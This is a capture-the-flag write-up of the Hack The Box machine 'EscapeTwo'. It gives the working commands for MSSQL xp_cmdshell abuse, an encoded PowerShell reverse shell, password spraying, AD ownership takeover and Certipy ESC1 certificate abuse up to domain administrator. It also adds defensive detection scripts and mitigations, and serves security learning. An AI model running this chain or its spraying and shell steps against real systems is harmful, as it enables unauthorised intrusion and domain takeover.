# EscapeTwo AD

## Summary

The initial access was straightforward, as the machine's description provided a username and password. Using these credentials, further enumeration was performed with **crackmapexec** to discover additional users. File shares were also checked for readable content, leading to an **SMB share** that contained an **XLS file**. Upon inspection, the file held credentials for several other users.

The most interesting service was **MSSQL**, which was leveraged using **Impacket** to gain a shell and read configuration files, revealing another password. A **password spray attack** with **crackmapexec** identified the user it belonged to.

For privilege escalation, that user held **Active Directory Rights Overwrite** privileges over a service account. By using this right to make **Ryan** the owner of that account and then leveraging **Certipy**, administrative access was obtained, leading to full system compromise.

## Challenge Information

* **Name:** EscapeTwo
* **Platform:** Hack The Box (HTB)
* **Category:** Active Directory (Windows)
* **Difficulty:** Easy
* **Objective:** Exploit Active Directory to retrieve the flag.
* **Tags:** `smbclient`, `evil-winrm`, `certipy`
* **Key Exploit:** Active Directory Rights Overwrite

## Machine Information

* **IP Address:** `10.10.11.51`
* **Domain:** `sequel.htb`
* **Domain Controller:** `DC01.sequel.htb`
* **Initial Credentials:** `rose / KxEPkKe6R8su`

## **Enumeration**

### nmap

A full port scan was conducted to identify open services.

`nmap -sC -sV -p- 10.10.11.51`

Discovered Open Ports & Services:

| Port | Service | Description |
|------|---------|-------------|
| 53 | DNS | Domain Name System |
| 88 | Kerberos | Authentication Service |
| 135 | RPC | Remote Procedure Call |
| 139 | NetBIOS | File Sharing Service |
| 389 | LDAP | Active Directory Queries |
| 445 | SMB | File Share Access |
| 1433 | MSSQL | Microsoft SQL Server 2019 |
| 5985 | WinRM | Windows Remote Management |

> Key Findings:
>
> * The machine is part of an Active Directory domain: `sequel.htb`.
> * A Microsoft SQL Server 2019 instance is running.
> * SMB and LDAP services indicate potential credential leaks.

Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to `/etc/hosts` for easier interaction with services.

`echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts`

### Initial Access

The challenge description provided the initial credentials:

```
Username: rose  
Password: KxEPkKe6R8su 
```

Using `crackmapexec` (invoked here through its successor, `nxc`), the shares readable with these credentials were listed.

```
nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares
```

![Shares file](/files/IsUh45uhplaN5oPZZmcI)

#### SMB Enumeration

The `Accounting Department` SMB share contained an **XLS file**, which was retrieved and analyzed.

```
# the share name contains a space, so the UNC path must be quoted
smbclient '\\sequel.htb\Accounting Department' -U rose
# inside the smbclient prompt: fetch every file in the share
smb: \> mget *
```

![Snippet images of command and action](/files/lmzGXNQFuGJbhtT3cYsX)

By extracting the contents of the XLS file, additional credentials were discovered:

```
angela : 0fwz7Q4mSpurIt99  
oscar : 86LxLBMgEWaKUnBG  
kevin : Md9Wlq1E5bZnVDVo  
sa : MSSQLP@ssw0rd!
```

### Exploiting MSSQL for Shell Access

{% hint style="info" %}
According to the MS documentation, xp\_cmdshell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text.
{% endhint %}

`xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]`

Using `impacket-mssqlclient`, a connection was established with the extracted `sa` credentials. The password is entered at the prompt rather than on the command line, because the `@` inside `MSSQLP@ssw0rd!` conflicts with Impacket's `user:password@host` target syntax.

```
impacket-mssqlclient sa@sequel.htb
Password:            # MSSQLP@ssw0rd! (from the XLS file)
```

#### **Enabling xp\_cmdshell**

The `xp_cmdshell` feature was enabled to execute system commands.

```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```
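Enabling `xp_cmdshell` leaves a trace: SQL Server writes a `Configuration option '...' changed from 0 to 1` message to the ERRORLOG every time `sp_configure` changes a value. The following detection script is an added example (not part of the original write-up) that scans ERRORLOG lines for risky options being switched on; the log excerpt inside it is constructed for the demonstration and was not captured from the target.

```python
import re
from typing import Dict, List

# sp_configure options whose activation typically precedes OS-level command
# execution or data movement from inside SQL Server.
RISKY_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "Ad Hoc Distributed Queries",
    "clr enabled",
}

# SQL Server logs this informational message to the ERRORLOG each time
# sp_configure changes a value; the pattern follows that message text.
CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+spid(?P<spid>\d+)s?\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


def find_risky_enables(log_lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per line that switches a risky option from 0 to non-zero.

    Lines that disable an option (non-zero -> 0) or touch harmless options such
    as 'show advanced options' are ignored, so the output is the short list a
    responder actually wants to review.
    """
    findings: List[Dict[str, str]] = []
    for line in log_lines:
        m = CONFIG_CHANGE_RE.match(line.strip())
        if m is None:
            continue
        option = m.group("option")
        if option in RISKY_OPTIONS and m.group("old") == "0" and m.group("new") != "0":
            findings.append({"time": m.group("ts"), "spid": m.group("spid"), "option": option})
    return findings


# Constructed ERRORLOG excerpt for demonstration (not captured from the target).
SAMPLE_ERRORLOG = [
    "2025-01-12 10:15:30.10 spid56      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2025-01-12 10:15:31.20 spid56      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2025-01-12 10:15:31.55 spid56      Starting up database 'tempdb'.",
    "2025-01-12 10:20:02.01 spid61      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2025-01-12 11:02:44.90 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.",
]

if __name__ == "__main__":
    for f in find_risky_enables(SAMPLE_ERRORLOG):
        print(f"{f['time']} spid{f['spid']}: '{f['option']}' was enabled")
```

On the sample the script reports only the two enabling events (`xp_cmdshell` on spid 56 and `Ole Automation Procedures` on spid 61); the later `xp_cmdshell` 1 to 0 change is the kind of clean-up an attacker may perform and is deliberately not flagged, so pair this with the session ID to find who issued the earlier enable.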

#### Gaining a Reverse Shell

A PowerShell reverse shell was executed using **Nishang**, base64-encoded and launched through `xp_cmdshell`.

![Nishang script being encoded](/files/uLvRH26P57Se9uXPFgXd)

```
xp_cmdshell 'powershell -enc <<base64_payload>>'
```

![Getting a shell as sequel\sql\_svc](/files/BHvzvgHsNGR0Kgy6ky0b)

With an active shell, further enumeration led to the discovery of the **SQL2019 configuration files** (`sql-Configuration.ini`), which contained plaintext credentials.

![List of dir with /SQL2019 as target](/files/WcIk7P6SOKs1pOOqbEf1)

![/SQL2019/ExpressAdv\_ENU file listing](/files/g7osGbZefiWYvwXTzC44)

![Snippet sql-configuration.ini](/files/hY7PNZnrhXVKL6bGCZGQ)

## Privilege Escalation – Active Directory Rights Overwrite

### Identifying New Credentials

After recovering a new password (`WqSZAF6CysDQbGb3`) from the configuration file, a password-spraying attack with `crackmapexec` against the domain's user list identified the account it belonged to:

![Using net user to list all users in the domain.](/files/zEvoC2NZ5prJ3bvO4G1c)

```
crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'
```

![User Ryan was successfully authenticated.](/files/nawz9Gr2WsJeyRMVPz1z)

### Identifying Privileges

Using [**PowerView**](https://github.com/aniqfakhrul/powerview.py), Ryan’s privileges were examined:

![Snippet using Powerview with Get-DomainUser](/files/YBfSPHfb9K3G00lWRKO3)

```
Get-DomainUser -Identity ryan -Select ObjectSid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
```

![result Get-DomainUser -Identity ryan -Select ObjectSid](/files/9xJLQcMnN1tF0Hz6G5tP)

![result Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier \<SID>](/files/ZcUqJomnb8NBdI9ILLYg)

Ryan held **Active Directory Rights Overwrite** privileges over the `ca_svc` account, which allowed taking control of it.
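The reason this right matters is the chain it opens: whoever can change an object's owner can rewrite its DACL, and whoever can rewrite the DACL can grant themselves full control. The following is an added example (not part of the original write-up) of the triage logic a defender would run over exported ACEs to spot such paths on sensitive accounts. It uses Ryan's SID and the domain SID from the write-up; the `ca_svc` distinguished name, the extra SIDs, and the ACE list are constructed for the demonstration.

```python
from dataclasses import dataclass
from typing import Dict, List

# Rights that hand over the object outright, directly or through the
# owner -> DACL -> full-control chain used in this write-up.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl"}

# Attribute GUID of msDS-KeyCredentialLink; write access enables a shadow-credentials takeover.
KEY_CREDENTIAL_LINK_GUID = "5b47d60f-6090-40b2-9f37-2a4de88f3063"

# Principals whose control over sensitive objects is expected. The well-known
# SIDs are real; the domain prefix is the domain SID seen in the write-up.
DOMAIN_SID = "S-1-5-21-548670397-972687484-3496335370"
TRUSTED_SIDS = {
    "S-1-5-18",            # LocalSystem
    "S-1-5-32-544",        # BUILTIN\Administrators
    f"{DOMAIN_SID}-512",   # Domain Admins
    f"{DOMAIN_SID}-519",   # Enterprise Admins
}


@dataclass
class Ace:
    object_dn: str         # object the ACE is set on
    trustee_sid: str       # principal receiving the right
    right: str             # e.g. GenericAll, WriteOwner, WriteProperty, ReadProperty
    object_type: str = ""  # attribute or extended-right GUID for object-specific ACEs
    ace_type: str = "Allow"


def takeover_paths(aces: List[Ace], owners: Dict[str, str]) -> List[Dict[str, str]]:
    """List every untrusted principal that can take over an object.

    `owners` maps object DN -> owner SID. An owner is reported even without an
    explicit ACE, because an owner can always rewrite the object's DACL.
    """
    findings: List[Dict[str, str]] = []
    for dn, owner_sid in owners.items():
        if owner_sid not in TRUSTED_SIDS:
            findings.append({"object": dn, "principal": owner_sid, "via": "Owner"})
    for ace in aces:
        # Deny ACEs and expected administrators never produce a finding.
        if ace.ace_type != "Allow" or ace.trustee_sid in TRUSTED_SIDS:
            continue
        if ace.right in TAKEOVER_RIGHTS:
            via = ace.right
        elif ace.right == "WriteProperty" and ace.object_type.lower() == KEY_CREDENTIAL_LINK_GUID:
            via = "WriteProperty:msDS-KeyCredentialLink"
        else:
            continue
        findings.append({"object": ace.object_dn, "principal": ace.trustee_sid, "via": via})
    return findings


# Constructed sample: the DN and the -1120/-1121 SIDs are made up; Ryan's SID is from the write-up.
CA_SVC_DN = "CN=ca_svc,CN=Users,DC=sequel,DC=htb"
RYAN_SID = f"{DOMAIN_SID}-1114"
SAMPLE_ACES = [
    Ace(CA_SVC_DN, f"{DOMAIN_SID}-512", "GenericAll"),                                 # expected admin control
    Ace(CA_SVC_DN, RYAN_SID, "WriteOwner"),                                            # the path used in the write-up
    Ace(CA_SVC_DN, "S-1-5-11", "ReadProperty"),                                        # Authenticated Users, harmless
    Ace(CA_SVC_DN, f"{DOMAIN_SID}-1120", "WriteProperty", KEY_CREDENTIAL_LINK_GUID),   # shadow-credentials path
    Ace(CA_SVC_DN, f"{DOMAIN_SID}-1121", "WriteOwner", ace_type="Deny"),               # deny ACE, ignored
]
SAMPLE_OWNERS = {CA_SVC_DN: f"{DOMAIN_SID}-512"}

if __name__ == "__main__":
    for f in takeover_paths(SAMPLE_ACES, SAMPLE_OWNERS):
        print(f"{f['principal']} can take over {f['object']} via {f['via']}")
```

Run against a real export, the same function would flag Ryan's `WriteOwner` before any of the later steps happen; the `Owner` branch is what catches the state after `Set-DomainObjectOwner`, when the ACE itself may already have been cleaned up.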

### Assigning Ryan as Owner

Set Ryan as the owner of the `ca_svc` account, then grant him full control over it:

```
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
```

{% hint style="warning" %}
A clean-up script on the machine periodically reverts these changes, so this step may need to be re-run several times.
{% endhint %}

![the command being executed to assign ca\_svc ownership to Ryan.](/files/6lxialPjwIxKHAmn1gGI)

### Certificate-Based Authentication (Certipy)

With control over `ca_svc`, **Certipy** was first used to take over the account through shadow credentials and recover its NT hash, which is later used to request a certificate for administrator authentication.

`certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc`

![Clock skew error](/files/k5ulm1v4OwqJXhQ1D4Hq)

{% hint style="danger" %}
Fix this by syncing the attacking machine's clock with the DC (run as root):

`timedatectl set-ntp off; ntpdate {dc_ip}`
{% endhint %}

After fixing the clock skew, re-run the ownership assignment if needed and repeat the `shadow auto` command; it returns the `ca_svc` NT hash and a Kerberos ccache. The ccache is then used to find the vulnerable certificate template and adjust it for enrollment:

![getting ca\_svc hash](/files/wd4qSfBroK8yoKhToyzp)

```
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51
```

![Finding vulnerable template from Kerberos](/files/EA0XUgBqQIZrQkZat4PS)

![Ensure ca\_svc cache in the template.](/files/lDs81nvVJGoG1usbBkvm)
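`certipy find -vulnerable` flags `DunderMifflinAuthentication` because, once the template is rewritten, it satisfies every ESC1 condition at once: the enrollee supplies the subject (so an arbitrary UPN can be requested), no manager approval or authorized signature is required, the certificate is valid for client authentication, and low-privileged principals can enroll. The following checker is an added example (not part of the original write-up or of Certipy) that evaluates those conditions on template attributes as they would be read from LDAP. The flag and OID constants are the documented Microsoft values; the two template records are constructed, since the write-up names the template but does not print its attributes.

```python
from typing import Dict, List

# Extended key usages that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # bit in msPKI-Enrollment-Flag (manager approval)

# Broad groups; an Enroll right for any of them counts as low-privileged enrollment.
DOMAIN_SID = "S-1-5-21-548670397-972687484-3496335370"   # domain SID from the write-up
LOW_PRIV_SIDS = {
    "S-1-1-0",               # Everyone
    "S-1-5-11",              # Authenticated Users
    "S-1-5-32-545",          # BUILTIN\Users
    f"{DOMAIN_SID}-513",     # Domain Users
    f"{DOMAIN_SID}-515",     # Domain Computers
}


def esc1_check(template: Dict) -> Dict:
    """Evaluate one template against the ESC1 conditions.

    Expected keys: name, name_flag (msPKI-Certificate-Name-Flag), enrollment_flag
    (msPKI-Enrollment-Flag), ra_signatures (msPKI-RA-Signature), ekus (list of
    OIDs; an empty list means no EKU restriction), enroll_sids (principals holding
    the Enroll right). ESC1 requires all five conditions to hold at the same time.
    """
    met: List[str] = []
    if template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject (arbitrary UPN in the request)")
    if not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("no manager approval required")
    if template["ra_signatures"] == 0:
        met.append("no authorized signatures required")
    if not template["ekus"] or AUTH_EKUS & set(template["ekus"]):
        met.append("certificate usable for authentication")
    if set(template["enroll_sids"]) & LOW_PRIV_SIDS:
        met.append("low-privileged principals can enroll")
    return {"name": template["name"], "vulnerable": len(met) == 5, "conditions": met}


# Constructed attribute values illustrating the template after `certipy template`.
MODIFIED_TEMPLATE = {
    "name": "DunderMifflinAuthentication",
    "name_flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "enrollment_flag": 0,
    "ra_signatures": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll_sids": ["S-1-5-11"],
}

# Constructed hardened counterpart: subject built from AD, CA manager approval required.
HARDENED_TEMPLATE = {
    "name": "DunderMifflinAuthentication-hardened",
    "name_flag": 0x82000000,  # SUBJECT_REQUIRE_DIRECTORY_PATH | SUBJECT_ALT_REQUIRE_UPN
    "enrollment_flag": CT_FLAG_PEND_ALL_REQUESTS,
    "ra_signatures": 0,
    "ekus": ["1.3.6.1.5.5.7.3.2"],
    "enroll_sids": [f"{DOMAIN_SID}-512"],
}

if __name__ == "__main__":
    for t in (MODIFIED_TEMPLATE, HARDENED_TEMPLATE):
        r = esc1_check(t)
        print(f"{r['name']}: vulnerable={r['vulnerable']}; conditions met: {r['conditions']}")
```

The hardened record shows that removing any single condition is enough to close ESC1; in practice the subject-name flag (let the CA build the subject from AD) and manager approval are the two that defenders control most easily, and the `conditions` list tells you which one still stands after a change.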

### Requesting a Certificate for Administrator Access

`certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug`

![result from command](/files/06C0kh58Uym4AgZXZjbB)

### Authenticating as Administrator

`certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51`

![Getting hash that will use to login.](/files/68MHrI0RtTWWC3Vpn6aj)

Using **Evil-WinRM** with the recovered NT hash, administrator access was established:

`evil-winrm -i dc01.sequel.htb -u administrator -H {admin_hash}`

![result command](/files/yI4bIL7LzPkl9okaJ9HC)

## **Conclusion**

This machine demonstrated the importance of securing **Active Directory Certificate Services (ADCS)** and **MSSQL xp\_cmdshell**. Key takeaways:

1. **Avoid embedding plaintext credentials in files.**
2. **Restrict SMB access to authenticated and authorized users.**
3. **Disable unnecessary SQL Server features like xp\_cmdshell.**
4. **Monitor Active Directory rights assignments, especially over critical accounts.**

This was an engaging Active Directory exploitation challenge that emphasized **SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations**.

